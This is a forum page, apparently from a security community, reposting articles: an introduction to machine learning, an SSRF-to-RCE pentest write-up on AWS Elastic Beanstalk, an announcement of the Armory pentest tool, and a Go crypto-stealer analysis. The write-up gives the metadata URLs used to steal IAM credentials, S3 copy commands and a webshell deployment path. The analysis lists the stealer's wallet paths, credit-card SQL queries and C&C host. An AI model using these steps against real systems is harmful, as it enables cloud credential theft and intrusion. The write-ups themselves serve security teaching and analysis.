Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 02/08/19 in all areas

  1. Machine Learning for Everyone In simple words. With real-world examples. Yes, again 21 november 2018 :: 28834 views :: 8137 words This article in other languages: Russian (original) Special thanks for help: @wcarss, @sudodoki and my wife ❤️ Machine Learning is like sex in high school. Everyone is talking about it, a few know what to do, and only your teacher is doing it. If you ever tried to read articles about machine learning on the Internet, most likely you stumbled upon two types of them: thick academic trilogies filled with theorems (I couldn’t even get through half of one) or fishy fairytales about artificial intelligence, data-science magic, and jobs of the future. I decided to write a post I’ve been wishing existed for a long time. A simple introduction for those who always wanted to understand machine learning. Only real-world problems, practical solutions, simple language, and no high-level theorems. One and for everyone. Whether you are a programmer or a manager. Let's roll. Why do we want machines to learn? This is Billy. Billy wants to buy a car. He tries to calculate how much he needs to save monthly for that. He went over dozens of ads on the internet and learned that new cars are around $20,000, used year-old ones are $19,000, 2-year old are $18,000 and so on. Billy, our brilliant analytic, starts seeing a pattern: so, the car price depends on its age and drops $1,000 every year, but won't get lower than $10,000. In machine learning terms, Billy invented regression – he predicted a value (price) based on known historical data. People do it all the time, when trying to estimate a reasonable cost for a used iPhone on eBay or figure out how many ribs to buy for a BBQ party. 200 grams per person? 500? Yeah, it would be nice to have a simple formula for every problem in the world. Especially, for a BBQ party. Unfortunately, it's impossible. Let's get back to cars. The problem is, they have different manufacturing dates, dozens of options, technical condition, seasonal demand spikes, and god only knows how many more hidden factors. An average Billy can't keep all that data in his head while calculating the price. Me too. People are dumb and lazy – we need robots to do the maths for them. So, let's go the computational way here. Let's provide the machine some data and ask it to find all hidden patterns related to price. Aaaand it works. The most exciting thing is that the machine copes with this task much better than a real person does when carefully analyzing all the dependencies in their mind. That was the birth of machine learning. Articol complet: https://vas3k.com/blog/machine_learning/
    1 point
  2. Exploiting SSRF in AWS Elastic Beanstalk February 1, 2019 In this blog, Sunil Yadav, our lead trainer for “Advanced Web Hacking” training class, will discuss a case study where a Server-Side Request Forgery (SSRF) vulnerability was identified and exploited to gain access to sensitive data such as the source code. Further, the blog discusses the potential areas which could lead to Remote Code Execution (RCE) on the application deployed on AWS Elastic Beanstalk with Continuous Deployment (CD) pipeline. AWS Elastic Beanstalk AWS Elastic Beanstalk, is a Platform as a Service (PaaS) offering from AWS for deploying and scaling web applications developed for various environments such as Java, .NET, PHP, Node.js, Python, Ruby and Go. It automatically handles the deployment, capacity provisioning, load balancing, auto-scaling, and application health monitoring. Provisioning an Environment AWS Elastic Beanstalk supports Web Server and Worker environment provisioning. Web Server environment – Typically suited to run a web application or web APIs. Worker Environment – Suited for background jobs, long-running processes. A new application can be configured by providing some information about the application, environment and uploading application code in the zip or war files. Figure 1: Creating an Elastic Beanstalk Environment When a new environment is provisioned, AWS creates an S3 Storage bucket, Security Group, an EC2 instance. It also creates a default instance profile, called aws-elasticbeanstalk-ec2-role, which is mapped to the EC2 instance with default permissions. When the code is deployed from the user computer, a copy of the source code in the zip file is placed in the S3 bucket named elasticbeanstalk–region-account-id. Figure 2: Amazon S3 buckets Elastic Beanstalk doesn’t turn on default encryption for the Amazon S3 bucket that it creates. This means that by default, objects are stored unencrypted in the bucket (and are accessible only by authorized users). Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html Managed Policies for default Instance Profile – aws-elasticbeanstalk-ec2-role: AWSElasticBeanstalkWebTier – Grants permissions for the application to upload logs to Amazon S3 and debugging information to AWS X-Ray. AWSElasticBeanstalkWorkerTier – Grants permissions for log uploads, debugging, metric publication, and worker instance tasks, including queue management, leader election, and periodic tasks. AWSElasticBeanstalkMulticontainerDocker – Grants permissions for the Amazon Elastic Container Service to coordinate cluster tasks. Policy “AWSElasticBeanstalkWebTier” allows limited List, Read and Write permissions on the S3 Buckets. Buckets are accessible only if bucket name starts with “elasticbeanstalk-”, and recursive access is also granted. Figure 3: Managed Policy – “AWSElasticBeanstalkWebTier” Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html Analysis While we were continuing with our regular pentest, we came across an occurrence of Server-Side Request Forgery (SSRF) vulnerability in the application. The vulnerability was confirmed by making a DNS Call to an external domain and this was further verified by accessing the “http://localhost/server-status” which was configured to only allow localhost to access it as shown in the Figure 4 below. http://staging.xxxx-redacted-xxxx.com/view_pospdocument.php?doc=http://localhost/server-status Figure 4: Confirming SSRF by accessing the restricted page Once SSRF was confirmed, we then moved towards confirming that the service provider is Amazon through server fingerprinting using services such as https://ipinfo.io. Thereafter, we tried querying AWS metadata through multiple endpoints, such as: http://169.254.169.254/latest/dynamic/instance-identity/document http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role We retrieved the account ID and Region from the API “http://169.254.169.254/latest/dynamic/instance-identity/document”: Figure 5: AWS Metadata – Retrieving the Account ID and Region We then retrieved the Access Key, Secret Access Key, and Token from the API “http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role”: Figure 6: AWS Metadata – Retrieving the Access Key ID, Secret Access Key, and Token Note: The IAM security credential of “aws-elasticbeanstalk-ec2-role” indicates that the application is deployed on Elastic Beanstalk. We further configured AWS Command Line Interface(CLI), as shown in Figure 7: Figure 7: Configuring AWS Command Line Interface The output of “aws sts get-caller-identity” command indicated that the token was working fine, as shown in Figure 8: Figure 8: AWS CLI Output : get-caller-identity So, so far, so good. Pretty standard SSRF exploit, right? This is where it got interesting….. Let’s explore further possibilities Initially, we tried running multiple commands using AWS CLI to retrieve information from the AWS instance. However, access to most of the commands were denied due to the security policy in place, as shown in Figure 9 below: Figure 9: Access denied on ListBuckets operation We also know that the managed policy “AWSElasticBeanstalkWebTier” only allows to access S3 buckets whose name start with “elasticbeanstalk”: So, in order to access the S3 bucket, we needed to know the bucket name. Elastic Beanstalk creates an Amazon S3 bucket named elasticbeanstalk-region-account-id. We found out the bucket name using the information retrieved earlier, as shown in Figure 4. Region: us-east-2 Account ID: 69XXXXXXXX79 Now, the bucket name is “elasticbeanstalk-us-east-2-69XXXXXXXX79”. We listed bucket resources for bucket “elasticbeanstalk-us-east-2-69XXXXXXXX79” in a recursive manner using AWS CLI: aws s3 ls s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ Figure 10: Listing S3 Bucket for Elastic Beanstalk We got access to the source code by downloading S3 resources recursively as shown in Figure 11. aws s3 cp s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ /home/foobar/awsdata –recursive Figure 11: Recursively copy all S3 Bucket Data Pivoting from SSRF to RCE Now that we had permissions to add an object to an S3 bucket, we uploaded a PHP file (webshell101.php inside the zip file) through AWS CLI in the S3 bucket to explore the possibilities of remote code execution, but it didn’t work as updated source code was not deployed on the EC2 instance, as shown in Figure 12 and Figure 13: Figure 12: Uploading a webshell through AWS CLI in the S3 bucket Figure 13: 404 Error page for Web Shell in the current environment We took this to our lab to explore on some potential exploitation scenarios where this issue could lead us to an RCE. Potential scenarios were: Using CI/CD AWS CodePipeline Rebuilding the existing environment Cloning from an existing environment Creating a new environment with S3 bucket URL Using CI/CD AWS CodePipeline: AWS CodePipeline is a CI/CD service which builds, tests and deploys code every time there is a change in code (based on the policy). The Pipeline supports GitHub, Amazon S3 and AWS CodeCommit as source provider and multiple deployment providers including Elastic Beanstalk. The AWS official blog on how this works can be found here: The software release, in case of our application, is automated using AWS Pipeline, S3 bucket as a source repository and Elastic Beanstalk as a deployment provider. Let’s first create a pipeline, as seen in Figure 14: Figure 14: Pipeline settings Select S3 bucket as source provider, S3 bucket name and enter the object key, as shown in Figure 15: Figure 15: Add source stage Configure a build provider or skip build stage as shown in Figure 16: Figure 16: Skip build stage Add a deploy provider as Amazon Elastic Beanstalk and select an application created with Elastic Beanstalk, as shown in Figure 17: Figure 17: Add deploy provider A new pipeline is created as shown below in Figure 18: Figure 18: New Pipeline created successfully Now, it’s time to upload a new file (webshell) in the S3 bucket to execute system level commands as show in Figure 19: Figure 19: PHP webshell Add the file in the object configured in the source provider as shown in Figure 20: Figure 20: Add webshell in the object Upload an archive file to S3 bucket using the AWS CLI command, as shown in Figure 21: Figure 21: Cope webshell in S3 bucket aws s3 cp 2019028gtB-InsuranceBroking-stag-v2.0024.zip s3://elasticbeanstalk-us-east-1-696XXXXXXXXX/ The moment the new file is updated, CodePipeline immediately starts the build process and if everything is OK, it will deploy the code on the Elastic Beanstalk environment, as shown in Figure 22: Figure 22: Pipeline Triggered Once the pipeline is completed, we can then access the web shell and execute arbitrary commands to the system, as shown in Figure 23. Figure 23: Running system level commands And here we got a successful RCE! Rebuilding the existing environment: Rebuilding an environment terminates all of its resources, remove them and create new resources. So in this scenario, it will deploy the latest available source code from the S3 bucket. The latest source code contains the web shell which gets deployed, as shown in Figure 24. Figure 24: Rebuilding the existing environment Once the rebuilding process is successfully completed, we can access our webshell and run system level commands on the EC2 instance, as shown in figure 25: Figure 25: Running system level commands from webshell101.php Cloning from the existing environment: If the application owner clones the environment, it again takes code from the S3 bucket which will deploy the application with a web shell. Cloning environment process is shown in Figure 26: Figure 26: Cloning from an existing Environment Creating a new environment: While creating a new environment, AWS provides two options to deploy code, one for uploading an archive file directly and another to select an existing archive file from the S3 bucket. By selecting the S3 bucket option and providing an S3 bucket URL, the latest source code will be used for deployment. The latest source code contains the web shell which gets deployed. References: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/iam-instanceprofile.html https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-welcome.html https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb https://ipinfo.io <BH Marketing> Our Advanced Web Hacking class at Black Hat USA contains this and many more real-world examples. Registration is now open. </BH Marketing> Sursa: https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/
    1 point
  3. Introducing Armory: External Pentesting Like a Boss Posted by Dan Lawson on February 04, 2019 Link TLDR; We are introducing Armory, a tool that adds a database backend to dozens of popular external and discovery tools. This allows you to run the tools directly from Armory, automatically ingest the results back into the database and use the new data to supply targets for other tools. Why? Over the past few years I’ve spent a lot of time conducting some relatively large-scale external penetration tests. This ends up being a massive exercise in managing various text files, with a moderately unhealthy dose of grep, cut, sed, and sort. It gets even more interesting as you discover new domains, new IP ranges or other new assets and must start the entire process over again. Long story short, I realized that if I could automate handling the data, my time would be freed up for actual testing and exploitation. So, Armory was born. What? Armory is written in Python. It works with both Python2 and Python3. It is composed of the main application, as well as modules and reports. Modules are wrapper scripts that run public (or private) tools using either data from the command line or from data in the database. The results of this are then either processed and imported into the database or just left in their text files for manual perusal. The database handles the following types of data: BaseDomains: Base domain names, mainly used in domain enumeration tools Domains: All discovered domains (and subdomains) IPs: IP addresses discovered CIDRs: CIDRs, along with owners that these IP addresses reside in, pulled from whois data ScopeCIDRs: CIDRs that are explicitly added are in scope. This is separated out from CIDRs since many times whois servers will return much larger CIDRs then may belong to a target/customer. Ports: Port numbers and services, usually populated by Nmap, Nessus, or Shodan Users: Users discovered via various means (leaked cred databases, LinkedIn, etc.) Creds: Sets of credentials discovered Additionally, with Basedomains, Domains and IPs you have two types of scoping: Active scope: Host is in scope and can have bad-touch tools run on it (i.e. nmap, gobuster, etc.). Passive scope: Host isn’t directly in scope but can have enumeration tools run against it (i.e. aquatone, sublist3r, etc.). If something is Active Scoped, it should also be Passive Scoped. The main purpose of Passive scoping is to handle situations where you may want data ingested into the database and the data may be useful to your customers, but you do not want to actively attack those targets. Take the following scenario: You are doing discovery and an external penetration test for a client trying to find out all of their assets. You find a few dozen random domains registered to that client but you are explicitly scoped to the subnets that they own. During the subdomain enumeration, you discover multiple development web servers hosted on Digital Ocean. Since you do not have permission to test against Digital Ocean, you don't want to actively attack it. However, this would still be valuable information for the client to receive. Therefore you can leave those hosts scoped Passive and you will not run any active tools on it. You can still generate reports later on including the passive hosts, thereby still capturing the data without breaking scope. Detalii complete: https://depthsecurity.com/blog/introducing-armory-external-pentesting-like-a-boss
    1 point
  4. Analyzing a new stealer written in Golang Posted: January 30, 2019 by hasherezade Golang (Go) is a relatively new programming language, and it is not common to find malware written in it. However, new variants written in Go are slowly emerging, presenting a challenge to malware analysts. Applications written in this language are bulky and look much different under a debugger from those that are compiled in other languages, such as C/C++. Recently, a new variant of Zebocry malware was observed that was written in Go (detailed analysis available here). We captured another type of malware written in Go in our lab. This time, it was a pretty simple stealer detected by Malwarebytes as Trojan.CryptoStealer.Go. This post will provide detail on its functionality, but also show methods and tools that can be applied to analyze other malware written in Go. Analyzed sample This stealer is detected by Malwarebytes as Trojan.CryptoStealer.Go: 992ed9c632eb43399a32e13b9f19b769c73d07002d16821dde07daa231109432 513224149cd6f619ddeec7e0c00f81b55210140707d78d0e8482b38b9297fc8f 941330c6be0af1eb94741804ffa3522a68265f9ff6c8fd6bcf1efb063cb61196 – HyperCheats.rar (original package) 3fcd17aa60f1a70ba53fa89860da3371a1f8de862855b4d1e5d0eb8411e19adf – HyperCheats.exe (UPX packed) 0bf24e0bc69f310c0119fc199c8938773cdede9d1ca6ba7ac7fea5c863e0f099 – unpacked Behavioral analysis Under the hood, Golang calls WindowsAPI, and we can trace the calls using typical tools, for example, PIN tracers. We see that the malware searches files under following paths: "C:\Users\tester\AppData\Local\Uran\User Data\" "C:\Users\tester\AppData\Local\Amigo\User\User Data\" "C:\Users\tester\AppData\Local\Torch\User Data\" "C:\Users\tester\AppData\Local\Chromium\User Data\" "C:\Users\tester\AppData\Local\Nichrome\User Data\" "C:\Users\tester\AppData\Local\Google\Chrome\User Data\" "C:\Users\tester\AppData\Local\360Browser\Browser\User Data\" "C:\Users\tester\AppData\Local\Maxthon3\User Data\" "C:\Users\tester\AppData\Local\Comodo\User Data\" "C:\Users\tester\AppData\Local\CocCoc\Browser\User Data\" "C:\Users\tester\AppData\Local\Vivaldi\User Data\" "C:\Users\tester\AppData\Roaming\Opera Software\" "C:\Users\tester\AppData\Local\Kometa\User Data\" "C:\Users\tester\AppData\Local\Comodo\Dragon\User Data\" "C:\Users\tester\AppData\Local\Sputnik\Sputnik\User Data\" "C:\Users\tester\AppData\Local\Google (x86)\Chrome\User Data\" "C:\Users\tester\AppData\Local\Orbitum\User Data\" "C:\Users\tester\AppData\Local\Yandex\YandexBrowser\User Data\" "C:\Users\tester\AppData\Local\K-Melon\User Data\" Those paths point to data stored from browsers. One interesting fact is that one of the paths points to the Yandex browser, which is popular mainly in Russia. The next searched path is for the desktop: "C:\Users\tester\Desktop\*" All files found there are copied to a folder created in %APPDATA%: The folder “Desktop” contains all the TXT files copied from the Desktop and its sub-folders. Example from our test machine: After the search is completed, the files are zipped: We can see this packet being sent to the C&C (cu23880.tmweb.ru/landing.php): Inside Golang compiled binaries are usually big, so it’s no surprise that the sample has been packed with UPX to minimize its size. We can unpack it easily with the standard UPX. As a result, we get plain Go binary. The export table reveals the compilation path and some other interesting functions: Looking at those exports, we can get an idea of the static libraries used inside. Many of those functions (trampoline-related) can be found in the module sqlite-3: https://github.com/mattn/go-sqlite3/blob/master/callback.go. Function crosscall2 comes from the Go runtime, and it is related to calling Go from C/C++ applications (https://golang.org/src/cmd/cgo/out.go). Tools For the analysis, I used IDA Pro along with the scripts IDAGolangHelper written by George Zaytsev. First, the Go executable has to be loaded into IDA. Then, we can run the script from the menu (File –> script file). We then see the following menu, giving access to particular features: First, we need to determine the Golang version (the script offers some helpful heuristics). In this case, it will be Go 1.2. Then, we can rename functions and add standard Go types. After completing those operations, the code looks much more readable. Below, you can see the view of the functions before and after using the scripts. Before (only the exported functions are named): After (most of the functions have their names automatically resolved and added): Many of those functions comes from statically-linked libraries. So, we need to focus primarily on functions annotated as main_* – that are specific to the particular executable. Code overview In the function “main_init”, we can see the modules that will be used in the application: It is statically linked with the following modules: GRequests (https://github.com/levigross/grequests) go-sqlite3 (https://github.com/mattn/go-sqlite3) try (https://github.com/manucorporat/try) Analyzing this function can help us predict the functionality; i.e. looking the above libraries, we can see that they will be communicating over the network, reading SQLite3 databases, and throwing exceptions. Other initializers suggests using regular expressions, zip format, and reading environmental variables. This function is also responsible for initializing and mapping strings. We can see that some of them are first base64 decoded: In string initializes, we see references to cryptocurrency wallets. Ethereum: Monero: The main function of Golang binary is annotated “main_main”. Here, we can see that the application is creating a new directory (using a function os.Mkdir). This is the directory where the found files will be copied. After that, there are several Goroutines that have started using runtime.newproc. (Goroutines can be used similarly as threads, but they are managed differently. More details can be found here). Those routines are responsible for searching for the files. Meanwhile, the Sqlite module is used to parse the databases in order to steal data. Then, the malware zips it all into one package, and finally, the package is uploaded to the C&C. What was stolen? To see what exactly which data the attacker is interested in, we can see look more closely at the functions that are performing SQL queries, and see the related strings. Strings in Golang are stored in bulk, in concatenated form: Later, a single chunk from such bulk is retrieved on demand. Therefore, seeing from which place in the code each string was referenced is not-so-easy. Below is a fragment in the code where an “sqlite3” database is opened (a string of the length 7 was retrieved): Another example: This query was retrieved from the full chunk of strings, by given offset and length: Let’s take a look at which data those queries were trying to fetch. Fetching the strings referenced by the calls, we can retrieve and list all of them: select name_on_card, expiration_month, expiration_year, card_number_encrypted, billing_address_id FROM credit_cards select * FROM autofill_profiles select email FROM autofill_profile_emails select number FROM autofill_profile_phone select first_name, middle_name, last_name, full_name FROM autofill_profile_names We can see that the browser’s cookie database is queried in search data related to online transactions: credit card numbers, expiration dates, as well as personal data such as names and email addresses. The paths to all the files being searched are stored as base64 strings. Many of them are related to cryptocurrency wallets, but we can also find references to the Telegram messenger. Software\\Classes\\tdesktop.tg\\shell\\open\\command \\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\ \\AppData\\Roaming\\Electrum\\wallets\\default_wallet \\AppData\\Local\\Torch\\User Data\\ \\AppData\\Local\\Uran\\User Data\\ \\AppData\\Roaming\\Opera Software\\ \\AppData\\Local\\Comodo\\User Data\\ \\AppData\\Local\\Chromium\\User Data\\ \\AppData\\Local\\Chromodo\\User Data\\ \\AppData\\Local\\Kometa\\User Data\\ \\AppData\\Local\\K-Melon\\User Data\\ \\AppData\\Local\\Orbitum\\User Data\\ \\AppData\\Local\\Maxthon3\\User Data\\ \\AppData\\Local\\Nichrome\\User Data\\ \\AppData\\Local\\Vivaldi\\User Data\\ \\AppData\\Roaming\\BBQCoin\\wallet.dat \\AppData\\Roaming\\Bitcoin\\wallet.dat \\AppData\\Roaming\\Ethereum\\keystore \\AppData\\Roaming\\Exodus\\seed.seco \\AppData\\Roaming\\Franko\\wallet.dat \\AppData\\Roaming\\IOCoin\\wallet.dat \\AppData\\Roaming\\Ixcoin\\wallet.dat \\AppData\\Roaming\\Mincoin\\wallet.dat \\AppData\\Roaming\\YACoin\\wallet.dat \\AppData\\Roaming\\Zcash\\wallet.dat \\AppData\\Roaming\\devcoin\\wallet.dat Big but unsophisticated malware Some of the concepts used in this malware remind us of other stealers, such as Evrial, PredatorTheThief, and Vidar. It has similar targets and also sends the stolen data as a ZIP file to the C&C. However, there is no proof that the author of this stealer is somehow linked with those cases. When we take a look at the implementation as well as the functionality of this malware, it’s rather simple. Its big size comes from many statically-compiled modules. Possibly, this malware is in the early stages of development— its author may have just started learning Go and is experimenting. We will be keeping eye on its development. At first, analyzing a Golang-compiled application might feel overwhelming, because of its huge codebase and unfamiliar structure. But with the help of proper tools, security researchers can easily navigate this labyrinth, as all the functions are labeled. Since Golang is a relatively new programming language, we can expect that the tools to analyze it will mature with time. Is malware written in Go an emerging trend in threat development? It’s a little too soon to tell. But we do know that awareness of malware written in new languages is important for our community. Sursa: https://blog.malwarebytes.com/threat-analysis/2019/01/analyzing-new-stealer-written-golang/
    1 point
  5. Fac si customizari, dar nu pe CMS-uri. Tinem legatura.
    1 point
  6. Update. Am actualizat topic-ul. In curand vine si site-ul.
    1 point
×
×
  • Create New...